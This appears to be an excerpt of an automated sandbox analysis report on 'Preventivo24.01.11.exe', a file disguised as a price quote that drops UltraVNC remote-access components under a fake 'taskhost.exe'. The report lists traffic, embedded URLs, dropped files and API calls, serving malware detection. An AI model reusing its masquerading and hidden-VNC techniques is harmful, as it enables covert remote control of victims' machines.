Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: /User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: www.example.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2

Source: shi6E82.tmp.0.dr	String found in binary or memory: http://.css
Source: shi6E82.tmp.0.dr	String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Games\taskhost.exe

Code function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,

41_2_001154D0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0100AD30 NtdllDefWindowProc_W,	0_2_0100AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,	0_2_00F773D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00F005B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,	0_2_00E98520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAEA60 NtdllDefWindowProc_W,	0_2_00EAEA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E98BD0 NtdllDefWindowProc_W,	0_2_00E98BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA2CE0 NtdllDefWindowProc_W,	0_2_00EA2CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,	0_2_00E9ADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBCDD0 NtdllDefWindowProc_W,	0_2_00EBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00EA2E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,	0_2_00EA9070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9B5C0 NtdllDefWindowProc_W,	0_2_00E9B5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F555C0 NtdllDefWindowProc_W,	0_2_00F555C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9BC20 NtdllDefWindowProc_W,	0_2_00E9BC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,	0_2_00E97D50

Source: C:\Games\taskhost.exe

